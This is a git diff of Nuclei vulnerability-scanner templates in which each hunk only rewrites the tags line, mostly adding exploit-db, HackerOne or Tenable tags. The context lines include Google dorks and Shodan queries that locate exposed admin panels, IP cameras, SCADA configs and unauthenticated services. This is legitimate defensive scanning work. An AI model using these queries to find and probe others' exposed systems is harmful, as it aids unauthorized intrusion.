+++ b/config/nuclei-templates/exposed-panels/vmware-horizon-panel.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6496 - tags: panel,horizon,vmware + tags: horizon,vmware,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/watchguard-panel.yaml b/config/nuclei-templates/exposed-panels/watchguard-panel.yaml index 83648f554..c74aa2b13 100644 --- a/config/nuclei-templates/exposed-panels/watchguard-panel.yaml +++ b/config/nuclei-templates/exposed-panels/watchguard-panel.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7008 - tags: panel,watchguard + tags: watchguard,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/weatherlink.yaml b/config/nuclei-templates/exposed-panels/weatherlink.yaml index c1834a6f1..7f7cf4b86 100644 --- a/config/nuclei-templates/exposed-panels/weatherlink.yaml +++ b/config/nuclei-templates/exposed-panels/weatherlink.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6007 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/web-local-craft.yaml b/config/nuclei-templates/exposed-panels/web-local-craft.yaml index 349640d8c..c04530f6a 100644 --- a/config/nuclei-templates/exposed-panels/web-local-craft.yaml +++ b/config/nuclei-templates/exposed-panels/web-local-craft.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6800 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/web-service-panel.yaml b/config/nuclei-templates/exposed-panels/web-service-panel.yaml index 942b6246f..75b87ea4f 100644 --- a/config/nuclei-templates/exposed-panels/web-service-panel.yaml +++ b/config/nuclei-templates/exposed-panels/web-service-panel.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7116 - tags: panel,service + tags: edb,panel,service requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/weblogic-uddiexplorer.yaml b/config/nuclei-templates/exposed-panels/weblogic-uddiexplorer.yaml index b952beff3..e9e3e0daa 100644 --- a/config/nuclei-templates/exposed-panels/weblogic-uddiexplorer.yaml +++ b/config/nuclei-templates/exposed-panels/weblogic-uddiexplorer.yaml @@ -8,7 +8,7 @@ info: Oracle WebLogic UDDI Explorer allows authorized users to access and modify information about the web services published in the private WebLogic Server UDDI registries. reference: - https://www.tenable.com/plugins/was/112421 - tags: panel,oracle,weblogic + tags: panel,oracle,weblogic,tenable requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/webmodule-ee-panel.yaml b/config/nuclei-templates/exposed-panels/webmodule-ee-panel.yaml index 540845923..8e0c7cb64 100644 --- a/config/nuclei-templates/exposed-panels/webmodule-ee-panel.yaml +++ b/config/nuclei-templates/exposed-panels/webmodule-ee-panel.yaml @@ -9,7 +9,7 @@ info: metadata: google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" shodan-query: title:"Webmodule" - tags: panel,webmodule-ee,login + tags: edb,panel,webmodule-ee,login requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/whm-login-detect.yaml b/config/nuclei-templates/exposed-panels/whm-login-detect.yaml index 558dab6e5..6668b5e22 100644 --- a/config/nuclei-templates/exposed-panels/whm-login-detect.yaml +++ b/config/nuclei-templates/exposed-panels/whm-login-detect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7128 - tags: whm,panel,login + tags: edb,whm,panel,login requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/wso2-management-console.yaml b/config/nuclei-templates/exposed-panels/wso2-management-console.yaml index 27a169d84..ef8789d18 100644 --- a/config/nuclei-templates/exposed-panels/wso2-management-console.yaml +++ b/config/nuclei-templates/exposed-panels/wso2-management-console.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/5691 metadata: shodan-query: http.favicon.hash:1398055326 - tags: panel,wso2 + tags: panel,wso2,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/xenmobile-login.yaml b/config/nuclei-templates/exposed-panels/xenmobile-login.yaml index ceafd5290..34ebcf567 100644 --- a/config/nuclei-templates/exposed-panels/xenmobile-login.yaml +++ b/config/nuclei-templates/exposed-panels/xenmobile-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6675 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/zimbra-web-client.yaml b/config/nuclei-templates/exposed-panels/zimbra-web-client.yaml index 8902d29f9..f4a13ef3a 100644 --- a/config/nuclei-templates/exposed-panels/zimbra-web-client.yaml +++ b/config/nuclei-templates/exposed-panels/zimbra-web-client.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.title:"Zimbra Web Client Sign In" - tags: panel,zimbra + tags: edb,panel,zimbra requests: - method: GET diff --git a/config/nuclei-templates/exposures/backups/exposed-mysql-initial.yaml b/config/nuclei-templates/exposures/backups/exposed-mysql-initial.yaml index 3df4611d5..9507657cc 100644 --- a/config/nuclei-templates/exposures/backups/exposed-mysql-initial.yaml +++ b/config/nuclei-templates/exposures/backups/exposed-mysql-initial.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://hackerone.com/reports/1081817 - tags: config,exposure + tags: config,exposure,hackerone requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/cisco-network-config.yaml b/config/nuclei-templates/exposures/configs/cisco-network-config.yaml index 0de9a2b42..bbad3af12 100644 --- a/config/nuclei-templates/exposures/configs/cisco-network-config.yaml +++ b/config/nuclei-templates/exposures/configs/cisco-network-config.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/5430 - tags: config,exposure,cisco + tags: exposure,cisco,edb,config requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/exposed-authentication-asmx.yaml b/config/nuclei-templates/exposures/configs/exposed-authentication-asmx.yaml index 419b353a1..5b26c6d12 100644 --- a/config/nuclei-templates/exposures/configs/exposed-authentication-asmx.yaml +++ b/config/nuclei-templates/exposures/configs/exposed-authentication-asmx.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/6604 - tags: config,exposure + tags: config,exposure,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/exposed-gitignore.yaml b/config/nuclei-templates/exposures/configs/exposed-gitignore.yaml index 0930be1c9..0928d1437 100644 --- a/config/nuclei-templates/exposures/configs/exposed-gitignore.yaml +++ b/config/nuclei-templates/exposures/configs/exposed-gitignore.yaml @@ -7,7 +7,7 @@ info: reference: - https://twitter.com/pratiky9967/status/1230001391701086208 - https://www.tenable.com/plugins/was/98595 - tags: config,git,exposure + tags: exposure,tenable,config,git requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/exposed-sharepoint-list.yaml b/config/nuclei-templates/exposures/configs/exposed-sharepoint-list.yaml index 160b2c7e1..7e8097d50 100644 --- a/config/nuclei-templates/exposures/configs/exposed-sharepoint-list.yaml +++ b/config/nuclei-templates/exposures/configs/exposed-sharepoint-list.yaml @@ -7,7 +7,7 @@ info: reference: - https://hackerone.com/reports/761158 - https://hackerone.com/reports/300539 - tags: config,exposure,sharepoint + tags: hackerone,config,exposure,sharepoint requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/honeywell-scada-config.yaml b/config/nuclei-templates/exposures/configs/honeywell-scada-config.yaml index e400486a0..3928f4c6f 100644 --- a/config/nuclei-templates/exposures/configs/honeywell-scada-config.yaml +++ b/config/nuclei-templates/exposures/configs/honeywell-scada-config.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/exploits/44734 - tags: scada,config,exposure + tags: scada,config,exposure,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/nagios-status-page.yaml b/config/nuclei-templates/exposures/configs/nagios-status-page.yaml index 5f78eb24f..fab259395 100644 --- a/config/nuclei-templates/exposures/configs/nagios-status-page.yaml +++ b/config/nuclei-templates/exposures/configs/nagios-status-page.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/6918 - tags: exposure,nagios,status + tags: exposure,nagios,status,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/prometheus-metrics.yaml b/config/nuclei-templates/exposures/configs/prometheus-metrics.yaml index d1c849f62..b98c6d64e 100644 --- a/config/nuclei-templates/exposures/configs/prometheus-metrics.yaml +++ b/config/nuclei-templates/exposures/configs/prometheus-metrics.yaml @@ -7,7 +7,7 @@ info: reference: - /~https://github.com/prometheus/prometheus - https://hackerone.com/reports/1026196 - tags: config,exposure,prometheus + tags: exposure,prometheus,hackerone,config requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/qdpm-info-leak.yaml b/config/nuclei-templates/exposures/configs/qdpm-info-leak.yaml index dce27fa1b..e96ed5260 100644 --- a/config/nuclei-templates/exposures/configs/qdpm-info-leak.yaml +++ b/config/nuclei-templates/exposures/configs/qdpm-info-leak.yaml @@ -7,7 +7,7 @@ info: description: qdPM 9.2 database credentials were discovered. reference: - https://www.exploit-db.com/exploits/50176 - tags: qdpm,exposure + tags: qdpm,exposure,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/configs/saia-web-server-info.yaml b/config/nuclei-templates/exposures/configs/saia-web-server-info.yaml index c749f4b16..6028fa843 100644 --- a/config/nuclei-templates/exposures/configs/saia-web-server-info.yaml +++ b/config/nuclei-templates/exposures/configs/saia-web-server-info.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/6865 - tags: config,exposure + tags: edb,config,exposure requests: - method: GET diff --git a/config/nuclei-templates/exposures/files/joomla-file-listing.yaml b/config/nuclei-templates/exposures/files/joomla-file-listing.yaml index ab9a61c77..055fccce2 100644 --- a/config/nuclei-templates/exposures/files/joomla-file-listing.yaml +++ b/config/nuclei-templates/exposures/files/joomla-file-listing.yaml @@ -12,7 +12,7 @@ info: cvss-score: 5.3 cwe-id: CWE-548 remediation: Disable directory indexing on the /libraries/joomla/database/ directory or remove the content from the web root. If the databases can be download, rotate any credentials contained in the databases. - tags: exposure,joomla,listing,database + tags: exposure,joomla,listing,database,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/files/redmine-config.yaml b/config/nuclei-templates/exposures/files/redmine-config.yaml index 68ddf2d4e..6f1e8d84f 100644 --- a/config/nuclei-templates/exposures/files/redmine-config.yaml +++ b/config/nuclei-templates/exposures/files/redmine-config.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true google-dork: intitle:"index of" configuration.yml - tags: exposure,redmine,devops + tags: exposure,redmine,devops,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/files/sensitive-storage-exposure.yaml b/config/nuclei-templates/exposures/files/sensitive-storage-exposure.yaml index 830166d27..0f21179b6 100644 --- a/config/nuclei-templates/exposures/files/sensitive-storage-exposure.yaml +++ b/config/nuclei-templates/exposures/files/sensitive-storage-exposure.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive keys file,logs,debugbar,app. reference: - https://www.exploit-db.com/ghdb/6304 - tags: expose,listing,config,logs,storage + tags: expose,listing,config,logs,storage,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/logs/fastcgi-echo.yaml b/config/nuclei-templates/exposures/logs/fastcgi-echo.yaml index 3c178f721..af00d74cb 100644 --- a/config/nuclei-templates/exposures/logs/fastcgi-echo.yaml +++ b/config/nuclei-templates/exposures/logs/fastcgi-echo.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true google-dork: inurl:fcgi-bin/echo - tags: exposure,logs,oracle,fastcgi + tags: exposure,logs,oracle,fastcgi,edb requests: - method: GET diff --git a/config/nuclei-templates/exposures/logs/struts-problem-report.yaml b/config/nuclei-templates/exposures/logs/struts-problem-report.yaml index 09515b9c8..02ebea4e0 100644 --- a/config/nuclei-templates/exposures/logs/struts-problem-report.yaml +++ b/config/nuclei-templates/exposures/logs/struts-problem-report.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/4278 - tags: exposure,apache,struts,debug + tags: struts,debug,edb,exposure,apache requests: - method: GET diff --git a/config/nuclei-templates/fuzzing/iis-shortname.yaml b/config/nuclei-templates/fuzzing/iis-shortname.yaml index 4af511245..2d3752e7e 100644 --- a/config/nuclei-templates/fuzzing/iis-shortname.yaml +++ b/config/nuclei-templates/fuzzing/iis-shortname.yaml @@ -8,7 +8,7 @@ info: reference: - /~https://github.com/lijiejie/IIS_shortname_Scanner - https://www.exploit-db.com/exploits/19525 - tags: fuzz + tags: fuzz,edb requests: - raw: diff --git a/config/nuclei-templates/iot/automation-direct.yaml b/config/nuclei-templates/iot/automation-direct.yaml index 80552356b..a98672faf 100644 --- a/config/nuclei-templates/iot/automation-direct.yaml +++ b/config/nuclei-templates/iot/automation-direct.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: http.title:"C-more -- the best HMI presented by AutomationDirect" google-dork: intitle:"C-more -- the best HMI presented by AutomationDirect" - tags: panel,iot + tags: panel,iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/codian-mcu-login.yaml b/config/nuclei-templates/iot/codian-mcu-login.yaml index 5f3afaa08..a4182c7a1 100644 --- a/config/nuclei-templates/iot/codian-mcu-login.yaml +++ b/config/nuclei-templates/iot/codian-mcu-login.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7404 metadata: shodan-query: http.title:"Codian MCU - Home page" - tags: iot + tags: iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/contacam.yaml b/config/nuclei-templates/iot/contacam.yaml index e951c3364..e619a2c1f 100644 --- a/config/nuclei-templates/iot/contacam.yaml +++ b/config/nuclei-templates/iot/contacam.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/6831 - tags: iot + tags: edb,iot requests: - method: GET diff --git a/config/nuclei-templates/iot/envision-gateway.yaml b/config/nuclei-templates/iot/envision-gateway.yaml index 87b61a01b..f485d6466 100644 --- a/config/nuclei-templates/iot/envision-gateway.yaml +++ b/config/nuclei-templates/iot/envision-gateway.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7315 metadata: shodan-query: http.title:"EnvisionGateway" - tags: iot + tags: iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/epmp-login.yaml b/config/nuclei-templates/iot/epmp-login.yaml index d8a3b800b..ce1594c65 100644 --- a/config/nuclei-templates/iot/epmp-login.yaml +++ b/config/nuclei-templates/iot/epmp-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6826 - tags: iot,panel + tags: panel,edb,iot requests: - method: GET diff --git a/config/nuclei-templates/iot/heatmiser-wifi-thermostat.yaml b/config/nuclei-templates/iot/heatmiser-wifi-thermostat.yaml index 44b598afb..f3e08e52b 100644 --- a/config/nuclei-templates/iot/heatmiser-wifi-thermostat.yaml +++ b/config/nuclei-templates/iot/heatmiser-wifi-thermostat.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7445 metadata: shodan-query: http.title:"Heatmiser Wifi Thermostat" - tags: iot + tags: iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/hp-laserjet-detect.yaml b/config/nuclei-templates/iot/hp-laserjet-detect.yaml index 6de8b80cd..7f25f1c30 100644 --- a/config/nuclei-templates/iot/hp-laserjet-detect.yaml +++ b/config/nuclei-templates/iot/hp-laserjet-detect.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/6459 - tags: iot + tags: iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/internet-service.yaml b/config/nuclei-templates/iot/internet-service.yaml index 1afb1c314..98535dd83 100644 --- a/config/nuclei-templates/iot/internet-service.yaml +++ b/config/nuclei-templates/iot/internet-service.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/5948 - tags: iot + tags: iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/liveview-axis-camera.yaml b/config/nuclei-templates/iot/liveview-axis-camera.yaml index ee685d669..85d7c8152 100644 --- a/config/nuclei-templates/iot/liveview-axis-camera.yaml +++ b/config/nuclei-templates/iot/liveview-axis-camera.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6843 - tags: iot,axis,network + tags: axis,network,edb,iot requests: - method: GET diff --git a/config/nuclei-templates/iot/mobotix-guest-camera.yaml b/config/nuclei-templates/iot/mobotix-guest-camera.yaml index 18cba181d..f08fc3d0a 100644 --- a/config/nuclei-templates/iot/mobotix-guest-camera.yaml +++ b/config/nuclei-templates/iot/mobotix-guest-camera.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6848 - tags: iot + tags: iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/netsurveillance-web.yaml b/config/nuclei-templates/iot/netsurveillance-web.yaml index f851db71b..d6f2df870 100644 --- a/config/nuclei-templates/iot/netsurveillance-web.yaml +++ b/config/nuclei-templates/iot/netsurveillance-web.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: http.title:"NETSurveillance WEB" google-dork: intitle:"NETSurveillance WEB" - tags: tech,iot + tags: tech,iot,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/novus-ip-camera.yaml b/config/nuclei-templates/iot/novus-ip-camera.yaml index 013696625..c6fa330a7 100644 --- a/config/nuclei-templates/iot/novus-ip-camera.yaml +++ b/config/nuclei-templates/iot/novus-ip-camera.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true google-dork: intitle:"NoVus IP camera" -com - tags: iot,panel,camera,novus + tags: camera,novus,edb,iot,panel requests: - method: GET diff --git a/config/nuclei-templates/iot/nuuno-network-login.yaml b/config/nuclei-templates/iot/nuuno-network-login.yaml index 3aed6fe01..b2df8d77d 100644 --- a/config/nuclei-templates/iot/nuuno-network-login.yaml +++ b/config/nuclei-templates/iot/nuuno-network-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6840 - tags: iot,panel,nuuo + tags: iot,panel,nuuo,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/panasonic-network-management.yaml b/config/nuclei-templates/iot/panasonic-network-management.yaml index 26262c73b..148bed407 100644 --- a/config/nuclei-templates/iot/panasonic-network-management.yaml +++ b/config/nuclei-templates/iot/panasonic-network-management.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/ghdb/6487 - tags: iot,camera,panasonic + tags: iot,camera,panasonic,edb requests: - method: GET diff --git a/config/nuclei-templates/iot/webcamxp-5.yaml b/config/nuclei-templates/iot/webcamxp-5.yaml index fba34abda..689f299d7 100644 --- a/config/nuclei-templates/iot/webcamxp-5.yaml +++ b/config/nuclei-templates/iot/webcamxp-5.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7448 metadata: shodan-query: http.title:"webcamXP 5" - tags: iot + tags: iot,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/adobe/adobe-connect-username-exposure.yaml b/config/nuclei-templates/misconfiguration/adobe/adobe-connect-username-exposure.yaml index 2e4d3089a..21edac88e 100644 --- a/config/nuclei-templates/misconfiguration/adobe/adobe-connect-username-exposure.yaml +++ b/config/nuclei-templates/misconfiguration/adobe/adobe-connect-username-exposure.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure + tags: adobe,disclosure,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/aem/aem-groovyconsole.yaml b/config/nuclei-templates/misconfiguration/aem/aem-groovyconsole.yaml index 215689532..4251ab58f 100644 --- a/config/nuclei-templates/misconfiguration/aem/aem-groovyconsole.yaml +++ b/config/nuclei-templates/misconfiguration/aem/aem-groovyconsole.yaml @@ -10,7 +10,7 @@ info: - https://twitter.com/XHackerx007/status/1435139576314671105 metadata: shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,hackerone requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/apache/apache-filename-enum.yaml b/config/nuclei-templates/misconfiguration/apache/apache-filename-enum.yaml index 5a6f43d2f..6602d54e6 100644 --- a/config/nuclei-templates/misconfiguration/apache/apache-filename-enum.yaml +++ b/config/nuclei-templates/misconfiguration/apache/apache-filename-enum.yaml @@ -8,7 +8,7 @@ info: reference: - https://hackerone.com/reports/210238 - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - tags: apache,misconfig + tags: apache,misconfig,hackerone requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/etcd-unauthenticated-api.yaml b/config/nuclei-templates/misconfiguration/etcd-unauthenticated-api.yaml index 6c7382e80..f4262e3ba 100644 --- a/config/nuclei-templates/misconfiguration/etcd-unauthenticated-api.yaml +++ b/config/nuclei-templates/misconfiguration/etcd-unauthenticated-api.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://hackerone.com/reports/1088429 - tags: unauth + tags: hackerone,unauth requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/exposed-jquery-file-upload.yaml b/config/nuclei-templates/misconfiguration/exposed-jquery-file-upload.yaml index 7078c4b70..3fd6eef98 100644 --- a/config/nuclei-templates/misconfiguration/exposed-jquery-file-upload.yaml +++ b/config/nuclei-templates/misconfiguration/exposed-jquery-file-upload.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/exploits/45584 - tags: exposure,jquery + tags: exposure,jquery,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/exposed-sqlite-manager.yaml b/config/nuclei-templates/misconfiguration/exposed-sqlite-manager.yaml index 6a86dc4ca..6a6622a84 100644 --- a/config/nuclei-templates/misconfiguration/exposed-sqlite-manager.yaml +++ b/config/nuclei-templates/misconfiguration/exposed-sqlite-manager.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/ghdb/5003 - tags: sqlite + tags: sqlite,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/haproxy-status.yaml b/config/nuclei-templates/misconfiguration/haproxy-status.yaml index 1f2eec4d1..8b1e87464 100644 --- a/config/nuclei-templates/misconfiguration/haproxy-status.yaml +++ b/config/nuclei-templates/misconfiguration/haproxy-status.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/ghdb/4191 - tags: logs,haproxy + tags: logs,haproxy,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/jboss-status.yaml b/config/nuclei-templates/misconfiguration/jboss-status.yaml index db0b84522..8c6dd4ac4 100644 --- a/config/nuclei-templates/misconfiguration/jboss-status.yaml +++ b/config/nuclei-templates/misconfiguration/jboss-status.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/5215 - tags: jboss,unauth + tags: jboss,unauth,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml b/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml index a51ab5b01..d9df6909f 100644 --- a/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml +++ b/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/50671 metadata: shodan-query: http.favicon.hash:1550906681 - tags: openbmcs,misconfig + tags: misconfig,edb,openbmcs requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-ssrf.yaml b/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-ssrf.yaml index ec55601a6..056c13dd6 100644 --- a/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-ssrf.yaml +++ b/config/nuclei-templates/misconfiguration/openbmcs/openbmcs-ssrf.yaml @@ -12,7 +12,7 @@ info: - https://www.exploit-db.com/exploits/50670 metadata: shodan-query: http.favicon.hash:1550906681 - tags: ssrf,oast,openbmcs + tags: ssrf,oast,openbmcs,edb requests: - raw: diff --git a/config/nuclei-templates/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml b/config/nuclei-templates/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml index 1c7b5d16f..868f54eac 100644 --- a/config/nuclei-templates/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml +++ b/config/nuclei-templates/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: phpmyadmin,misconfig + tags: phpmyadmin,misconfig,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml b/config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml index cbcb05559..6b066de41 100644 --- a/config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml +++ b/config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml @@ -11,7 +11,7 @@ info: metadata: verified: "true" google-dork: intitle:"Roxy file manager" - tags: roxy,fileman,rce,upload,intrusive,misconfig + tags: intrusive,misconfig,edb,roxy,fileman,rce,upload requests: - raw: diff --git a/config/nuclei-templates/misconfiguration/service-pwd.yaml b/config/nuclei-templates/misconfiguration/service-pwd.yaml index a34e9ea7b..1f9c0ef5d 100644 --- a/config/nuclei-templates/misconfiguration/service-pwd.yaml +++ b/config/nuclei-templates/misconfiguration/service-pwd.yaml @@ -7,7 +7,7 @@ info: description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service + tags: exposure,listing,service,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/solr-query-dashboard.yaml b/config/nuclei-templates/misconfiguration/solr-query-dashboard.yaml index f1cd3dea5..6b283fb2f 100644 --- a/config/nuclei-templates/misconfiguration/solr-query-dashboard.yaml +++ b/config/nuclei-templates/misconfiguration/solr-query-dashboard.yaml @@ -7,7 +7,7 @@ info: description: Solr's admin page was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5856 - tags: solr,unauth + tags: solr,unauth,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/tcpconfig.yaml b/config/nuclei-templates/misconfiguration/tcpconfig.yaml index 72d07f52c..3ea054441 100644 --- a/config/nuclei-templates/misconfiguration/tcpconfig.yaml +++ b/config/nuclei-templates/misconfiguration/tcpconfig.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/6782 - tags: logs,config + tags: config,edb,logs requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/unauthenticated-mongo-express.yaml b/config/nuclei-templates/misconfiguration/unauthenticated-mongo-express.yaml index 854c41cc8..845139288 100644 --- a/config/nuclei-templates/misconfiguration/unauthenticated-mongo-express.yaml +++ b/config/nuclei-templates/misconfiguration/unauthenticated-mongo-express.yaml @@ -7,7 +7,7 @@ info: description: Mongo Express was able to be access with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5684 - tags: mongo,unauth + tags: mongo,unauth,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/unauthenticated-popup-upload.yaml b/config/nuclei-templates/misconfiguration/unauthenticated-popup-upload.yaml index 0e63836d0..d65d87647 100644 --- a/config/nuclei-templates/misconfiguration/unauthenticated-popup-upload.yaml +++ b/config/nuclei-templates/misconfiguration/unauthenticated-popup-upload.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6671 - tags: fileupload,upload + tags: edb,fileupload,upload requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/unauthenticated-prtg.yaml b/config/nuclei-templates/misconfiguration/unauthenticated-prtg.yaml index 297ce00ea..93a9e0e90 100644 --- a/config/nuclei-templates/misconfiguration/unauthenticated-prtg.yaml +++ b/config/nuclei-templates/misconfiguration/unauthenticated-prtg.yaml @@ -7,7 +7,7 @@ info: description: PRTG Traffic Grapher was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5808 - tags: config,unauth,prtg + tags: config,unauth,prtg,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/unauthenticated-varnish-cache-purge.yaml b/config/nuclei-templates/misconfiguration/unauthenticated-varnish-cache-purge.yaml index 7f9941f12..d2ff11ea1 100644 --- a/config/nuclei-templates/misconfiguration/unauthenticated-varnish-cache-purge.yaml +++ b/config/nuclei-templates/misconfiguration/unauthenticated-varnish-cache-purge.yaml @@ -8,7 +8,7 @@ info: reference: - https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html - https://hackerone.com/reports/154278 - tags: varnish,misconfig,cache + tags: misconfig,cache,hackerone,varnish requests: - method: PURGE diff --git a/config/nuclei-templates/misconfiguration/ups-status.yaml b/config/nuclei-templates/misconfiguration/ups-status.yaml index aa2e68067..c4bf13963 100644 --- a/config/nuclei-templates/misconfiguration/ups-status.yaml +++ b/config/nuclei-templates/misconfiguration/ups-status.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/752 - tags: logs,status + tags: logs,status,edb requests: - method: GET diff --git a/config/nuclei-templates/misconfiguration/zabbix-dashboards-access.yaml b/config/nuclei-templates/misconfiguration/zabbix-dashboards-access.yaml index fdeeda060..3e99e4797 100644 --- a/config/nuclei-templates/misconfiguration/zabbix-dashboards-access.yaml +++ 